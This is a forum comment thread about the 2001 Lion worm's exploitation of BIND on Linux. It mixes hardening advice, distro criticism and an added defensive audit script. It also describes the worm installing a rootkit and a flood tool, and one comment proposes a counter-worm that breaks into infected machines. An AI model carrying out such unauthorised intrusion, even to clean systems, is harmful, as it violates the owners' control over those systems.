Note that I was talking about newbies in the majority of my post. Newbie admins are still newbies. And yes, I still think the distro makers are partly to blame, in that even the slickest installer isn't going to protect you from your own ignorance (e.g. "workstation" installations that install BIND, "server" installations that install basically every service, etc.). No distro maker can prevent newbie admins from shooting themselves in the foot, but at least they can try to make sure the newbies aren't covered in gasoline and handed a cigarette to smoke...
Professionalism is an inherent requirement to do well as an admin. My post however was directed at the person who just picked "everything" on a RH install whilst trying linux for the first time with their cable-modem-connected-and-no-firewall machine... For that person the distro makers do need to be very conservative with what they install by default and/or configure to be open to the world by default. Linux companies could definitely take a page from OpenBSD in this regard.
--
News for geeks in Austin: www.geekaustin.org
News for Geeks in Austin, TX
Version of the worm? Version of BIND vulnerable to the worm? Version of OpenBSD with a vulnerable version of BIND?
Anyway, I'm not surprised OpenBSD can get rooted by a vulnerable service. Once you get inside OpenBSD's (admittedly very hard) shell, it's about as easy to get root as with any other unix-derivative (i.e. not trivial usually but not impossible either).
--
News for geeks in Austin: www.geekaustin.org
News for Geeks in Austin, TX
As a developer, linux is sooooooooo much nicer in terms of development environment than windows or macos or (...). Well, I should say unix in general is this way. Part of it is having a very efficient CLI shell, part is the toolset that is available to make programmer's lives easier, part is I think due to the simple underlying philosophy of not getting in your way.
And I never said that server programs are evil, just insecurely installed server programs. ;-) I have all kinds of shit hanging off my workstation, but a) it's all pretty much locked down in service-specific ways to be reasonably secure, and b) I have a fairly tight firewall in between my internal LAN and the net (gotta love openBSD, IPF kicks the ass out of IPCHAINS).
--
News for geeks in Austin: www.geekaustin.org
News for Geeks in Austin, TX
Actually I've never noticed OpenSSH having problems. Care to elaborate? (genuinely curious, I use ssh in a pretty vanilla fashion so maybe I'm not hitting the bugs)
More generally, what do you have against DJB's and TdR's code? (again, I ask because I'm curious, I don't have an agenda about this except I like qmail better than sendmail because it's easier to config and openbsd because I like IPF more than IPCHAINS)
--
News for geeks in Austin: www.geekaustin.org
News for Geeks in Austin, TX
See my "bastille" comment a few posts up. If you're using a redhat-derivative (RH, Mandrake, etc.), look in /etc/init.d or /etc/rc.d/init.d for the shell scripts that turn things on and off (e.g. /etc/init.d/named stop). Editing /etc/inetd.conf or /etc/xinetd.conf to comment out or remove the ability of the inetd-superserver to start up a connection to service X is another approach. Also see the program "ntsysv" on RH derivatives that gives you easy access to the "what starts on boot" list (hint: you can safely uncomment most of that list :) ). Note that some services (e.g. bind) run on their own continuously and some run on an as-needed, connection-oriented basis from (x)inetd (e.g. telnet, ftp) and some can run either way (ftp, ssh), the exact methods for disabling them depend...
If you have an always on connection, consider getting a personal firewall (there are bazillions of them, I've had good luck with the Linksys (linksys.com) series of products, buy.com has good (sub $100 for some models) prices on them). Even if you end up ditching linux it'll make your windows/whatever boxen on the home lan more secure.
Long term, get yourself a good book on unix administration (the armadillo book from o'reilly is a good bet (author = aeleen frisch iirc)). Read the docs on the Linux Documentation Project, particularly the book-length opus on security and system performance tuning. (www.redhat.com/mirrors/LDP is usually the mirror I use, I _think_ the home url is www.linuxdoc.org). I know it seems like a mountain of information but give yourself 6 months or so and it'll all seem clear. (plus you can get a stable, reasonably lucrative job doing it if you devote enough time to becoming an admin to do it well).
You probably shouldn't be running bind (or anything else). Linux's security problems are almost always created by people leaving stuff up/on/open when they don't need to.
If you're a newbie, here's a partial list of things you don't need to install or have running on your new workstation: bind/named, any form of mail server (esp. sendmail), atd, smbd/nmbd (samba), inetd, any form of ftp daemon (wuftpd, et al.), NFS/NIS/portmap, basically anything that provides a service to the outside world. Machines on "always-on" connections and not behind firewalls are of course the most vulnerable...
The best policy is offering nothing, and only selectively opening up services as you need to. If you do have a machine that needs to provide a service, try to understand the service and the idiosyncrasies of the server program before you offer it, and keep tabs on updates...
Insert standard "wish-the-distros-would-wise-up-and-ship-closed-by-default-installations" thought here...
Doesn't having an open-source model make it easier for virus writers to find loopholes and exploits within an operating system?
Sure, you may fix it faster, but how are you going to get everyone to recompile?
Granted, the argument could be made that closed-source models don't allow you to close the holes yourself, or even guarantee a timely fix. But how many Linux users are able to fix a problem themselves? And the virus writer will have access to the fix too!
Ryan Finley
SurveyMonkey.com -- Create your own professional surveys
Try running the rootkit on a *bsd, solaris etc. Then you'll see why it is a linux problem.
-mutter- something something something...
no
yw
--
Je t'aime Stéphanie
GNU/Linux Worm?
Before starting, it is helpful to NOT review any Linux/Unix/Security books or websites, since they will warn you about checking for service vulnerabilities. It is imperative that you don't review:
a) basic server security concepts;
b) your distro's recent upgrades/patches (for the last two months);
c) reasons to run bind and how to do it safely.
Here's how to make your machine vulnerable to LION:
1) Install a Linux distro.
2) Install bind, but make sure you don't install a recent version! Recent versions won't let LION in!
3) Don't install any of your distro's security updates/patches.
4) Finally, connect this machine directly to the internet w/o a firewall -- it's crucial that people on the 'net be able to access your nameserver.
If you follow all these steps, your Linux machine is vulnerable to the "Lion" worm. If your Linux machine does not get infected, please review all the above steps and try again.
Treatment, not tyranny. End the drug war and free our American POWs.
See my user info for links.
Regardless, you should have tripwire or something running anyway
That is not a solution to the problem... nor does it lessen the severity of the thing. That "anyway" above is a pretty damn cocky statement. It would be more productive to simply warn people that they should have tripwire installed.
There are plenty of other reasons to run *nix. You might like the idea of a system that doesn't crash at the slightest provocation the way that Win9x does. You might like the fact that it comes with a whole development environment as standard equipment. You might have ethical objections to running a proprietary operating system. You might like the availability of standard *nix administration tools like crond and real shell scripting. You might have learned to use *nix at school and not want to learn a new system. There are plenty of reasons.
There's no point in questioning authority if you aren't going to listen to the answers.
If I'm not gonna be running "bind/named, any form of mail server (esp. sendmail), atd, smbd/nmbd (samba), inetd, any form of ftp daemon (wuftpd, et al.), NFS/NIS/portmap, basically anything that provides a service to the outside world. Machines on "always-on" connections and not behind firewalls are of course the most vulnerable..." why would I run *nix?
If you don't know what AltaVista is (was), get off my lawn.
The upside to all of this is that we Linux (Unix) users have alternatives to BIND (and Sendmail, and Apache, and WuFTPD and ...) and don't have to wait for patches when a problem occurs.
However, many of the posts thus far have advocated everyone dumping BIND for the poster's favorite flavor of DNS. They are correct, to a point, and I agree with those posters, to a point. However, all of us dumping BIND is not the answer. Just some of us should. Others should remain with BIND.
Competing apps should continue to compete with each other for users, but should not merge, or even share code (where possible).
When worms like this show up, having diverse products will often minimize the damage caused. As opposed to our favorite proprietary vendor. When something affects M$, it affects every M$ user, thus earning the title "M$ Virus", "M$ Worm", etc. When something strikes BIND and less than half of the Unix world uses BIND, it's rather difficult to label it a "Linux" or "Unix" problem.
It's a friggin' exploit! That's all. A virus/worm causes damages. A trojan is a program you run that does something malicious in the background. This does neither. It looks for an exploit, runs a script, and gives itself root access. /. made a major move to being mainstream media today. It went for the sensational story, and totally misreported the facts.
Get it now?
Kidding, kidding. But only half. Maybe not even half.
When the I Love You et al. virus was going around :) all the windows users sent us warnings about it even though we didn't care since we weren't using windows. Now that there is a virus for linux let's send warnings to all of our friends who run windows. It is a bit childish but it will give us some revenge for having to wade through the millions of warnings about different viruses
rather, network applications should be written securely. Sorry, but my belief is that if you are running a daemon that is susceptible to exploit that it is far better to patch it and/or install a secure alternative (i.e. SSH vs. telnet) than to spend half your day being paranoid over kidz running some dumb script. I was the network admin for an ISP for three years and not once were we broken into. I detected a multiplicity of pathetic attempts, however, all were obviously lame attempts at classic exploits. My opinion is that the real crackers will only spend their efforts on targets of either political (including "glory" targets such as M$) or financial. By safeguarding against glaring holes you should never have a problem. Never. Not once.
Fortunately, BIND can run chroot()'ed and unprivileged...
My ancestors evolved from primordial ooze, and all I got was this lousy Existential Angst!
As for the latest (January 29) vulnerability (TSIG), and the worm that now exploits it, this is just yet another reason to run "named" unprivileged and chroot()'ed, and to keep up to date with advisories and patches...
As for the "$500 cash reward" for finding a security hole in djbdns, don't forget to read the fine print in the guarantee: "My judgment is final as to what constitutes a security hole in djbdns". Feh!
I guess it's because most people who run Solaris et al. bother to ensure their systems are secure.... not that the average linux-kiddie hasn't written a kewl little script that they think ensures their system is uncrackable.
<p>(Why does that tag show up in preview?<p>
Tom.
Oh arse
I admit though, a decent sysadmin should not be affected by this problem, Linux or other *nix.
I use Suse Linux at home. Now I don't want to start a distribution war, but I found it to be very easy to install and get working right out of the box. It also has a good reputation for user-friendliness. However, it installs, by default, several nasty services that I don't want, including a couple of webservers. I know that Linux won't hit the mainstream until we can make it easy enough for Joe Sixpack to install everything he needs, but geez, we don't need to have such a wide variety of services in the default install. Have a way to start these services if we want them, but not until then.
Steven
-- I have marked myself unwilling to moderate-- I don't have other accounts to artificially inflate the karma of
. . .
I'd prefer to have no security holes, but if I had to choose I'd rather face a script kiddie than an experienced, determined cracker....
Is there really any difference between the two once you've been 0VVn3d? Any exploit that results in gaining root and you'd have to do what, reinstall, apply patches, then restore your data, making sure that everything is good that you're replacing, or you'll be owned all over again.
And who says that just because it's a script-kiddie attack that it's a script kid that got in, and not someone looking to sell your corporation's data to a competitor? Unless you can nail the little fscker down to an individual person, there really isn't any way to tell.
Fist Prost
"We're talking about a planet of helpdesks."
-Jaron Lanier
Yeah, and all your base are belong to us. Is that 3 errors in one sentence?
I think you mean Linux has very much arrived, judging by the number of nasty viruses (virii) starting to pop up.
...When the article clearly states that the problem is with BIND?
Can somebody explain this to me?
--Dave
Not mentioned in the SANS report but in the NIPC advisory the trojan also installs the Tribe tfn2k flood util, giving this the potential to launch a massive DoS attack.
--
Blaming GW Bush for the Iraq war is like blaming Ronald McDonald for the poor quality of food.
On dit LA jungle ;-)
unpatched, even. As opposed to the unpacthed version, which as we all know is riddled with exploits, backdoors, and 3 day old salami.
This thing can be extra nasty because of the root kit, but almost anyone will notice the extra services running. Although people with old versions of bind should upgrade, it's just common sense now. You might have been able to get away with an old version before now, but with this it would be a pain to have to rebuild the box.
The "SANS" report says something interesting: Lion is a new worm, that is very similar to the Ramen worm. However, this worm is much more dangerous and should be taken seriously.
Does this mean that the Ramen worm wasn't worth taking seriously? If so, why did the press make such an incredible stink about it? How many infections did Ramen have, and how many does Lion have?
As far as the Microsoft shills who say that now they (the paid MSFT shills) can poke fun at Linux for having a virus problem: You can do that the minute that some Indonesian Teen writes a virus-making-kit for Linux, and a Slovakian Teen paralyzes a few countries' email systems with a kit-written-worm named after a chick sports celebrity.
Until then, all you MSFT shills have is a monoculture with universally-inherited weaknesses (Outlook, Windows scripting host), led by a corporation whose only idea of security is to keep the people from copying the data they legally own.
I'm sure that this will be fixed in a service pack....
;p
--The space between my ears was intentionally left blank--
It can probably be blamed on stupid default installs. It really is pretty easy to run BIND as a non-root user. I always create a bind user and group and run it as that. BSDs ship that way by default; why is it so hard for linux distros to get the idea through their heads?
To ISC: Ha ha ha ha ha ha ha ha. To the Rest of the World: http://cr.yp.to/djbdns.html
It just goes to show that a bare install can be dangerously compromised by any amateur and as such linux really should be run by professionals who know what they are doing.
I think most people could get it with a bit of training (which they probably won't get, but there you go). I've decided that, when setting up a Linux box, the following command is one of my best friends:
netstat -anp | grep LISTEN
I got my Linux laptop at System76.
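An added example, not code from anyone in this thread: a small audit script that applies the two checks recommended above, the netstat LISTEN scan from this post and the "run named unprivileged and chroot()'ed" advice from the BIND posts earlier. It assumes "netstat -anp" and "ps -eo user,args" output formats; the sample outputs embedded below are constructed.

```shell
#!/bin/sh
# Added example, not from the thread: audit a box the way the posts above
# suggest. Input formats assumed: "netstat -anp" and "ps -eo user,args".

# Daemons the thread names as things a workstation should not expose.
RISKY_SERVICES='named|sendmail|portmap|rpc.nfsd|ypserv|smbd|nmbd|inetd|xinetd|wu-ftpd|in.ftpd|in.telnetd'

# Reads "netstat -anp" output on stdin; prints "proto local_addr program"
# for every LISTEN socket owned by a program on the risky list.
flag_risky_listeners() {
    grep 'LISTEN' | awk -v pat="$RISKY_SERVICES" '
        $NF ~ "/" {
            split($NF, p, "/")                 # "812/named" -> pid, program
            if (p[2] ~ ("^(" pat ")$")) print $1, $4, p[2]
        }'
}

# Reads "ps -eo user,args" output on stdin and classifies named:
# ABSENT, ROOT (runs as root), NOCHROOT (unprivileged but no -t dir),
# OK (unprivileged and started with BIND's -t chroot flag).
check_named_confinement() {
    awk '$2 ~ /(^|\/)named$/ {
            found = 1
            if ($1 == "root") root = 1
            chroot = 0
            for (i = 3; i <= NF; i++) if ($i == "-t") chroot = 1
            if (!chroot) nochroot = 1
         }
         END {
            if (!found) print "ABSENT"
            else if (root) print "ROOT"
            else if (nochroot) print "NOCHROOT"
            else print "OK"
         }'
}

# Constructed sample output, shaped like netstat -anp on a 2001-era box.
SAMPLE_NETSTAT='tcp  0  0 0.0.0.0:53    0.0.0.0:*  LISTEN  812/named
tcp  0  0 0.0.0.0:25    0.0.0.0:*  LISTEN  901/sendmail
tcp  0  0 0.0.0.0:22    0.0.0.0:*  LISTEN  640/sshd
tcp  0  0 127.0.0.1:631 0.0.0.0:*  LISTEN  430/cupsd
udp  0  0 0.0.0.0:53    0.0.0.0:*          812/named'

# Constructed sample output, shaped like ps -eo user,args.
SAMPLE_PS='USER COMMAND
root /usr/sbin/named'

echo "Risky listeners:"
printf '%s\n' "$SAMPLE_NETSTAT" | flag_risky_listeners
echo "named confinement: $(printf '%s\n' "$SAMPLE_PS" | check_named_confinement)"
```

On a live box, pipe the real `netstat -anp` and `ps -eo user,args` output into the two functions instead of the samples.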
He was quoting the submitter's comments. Who cares.
I almost submitted this one myself, but the story I read on it said it was discovered in January...oh well.
terradot, growing awareness
-linux... they can't *give* that shit away.
Not that Everything is a bad site, but sometimes it gets old looking at EVERY word being linked...
---"What did I say that sounded like 'Tell me about your day?'"---
Why would I want to run a closed source worm on my system???
Looks like another reason to use djbdns, which has a $500 security guarantee and is supposedly a lot more efficient than BIND.
For RedHat users, here's how to apply the fixes:
Download the appropriate RPMs to fix BIND.
At a shell, as root, type rpm -Ui package -- package of course being the name of the RPM.
Do you like German cars?
FreeVeracity
Tripwire is now a pay for play product, so I suggest using something like this which is open source/free and just as good
Secret Mir Casualty
360 degrees of Karma
Any serious system admins should have already patched or upgraded their copy of bind. If they were really good, they should have been running bind in a chroot jail.
Wizards, of course, will have already patched the bug when they re-implemented bind in assembler. :)
The only people this will affect are the ones dumb enough to have installed bind and not used it, or incompetent sysadmins who deserve to get burned.
--
I Hit the Karma Cap, and All I Got Was This Lousy
I'll show you *my* linux worm.
unf.
Does anyone know where to find a definitive list of worms/virii that can affect linux? It can't be that many, maybe a few dozen. That many Outlook viruses pop up every week. What we really need is a windows scripting host for linux. I guess the more the platform is deployed, the bigger target for virus-writers it becomes. It still must be much more difficult to write one for *nix though.
Where's my lobbyist? Right here.
I noticed in the article that a partial fix (LionFind) has been released. So, I have to ask... why not write LionFind so it can break into machines infected by Lion through the security hole created by Lion, inform the machine's owner, close the hole, and then use that box to look for the next box to disinfect?
-G.
--
Signature temporarily unavailable. Please try again.
"Experience is what you get when you don't get what you want."
Linux is a strong OS but as it has grown in popularity and usage did anybody really doubt that people would start to create viruses and other nuisances that could be intrinsically more dangerous than existing win viruses? It just goes to show that a bare install can be dangerously compromised by any amateur and as such linux really should be run by professionals who know what they are doing.. i mean how many of you still come across people running as ROOT???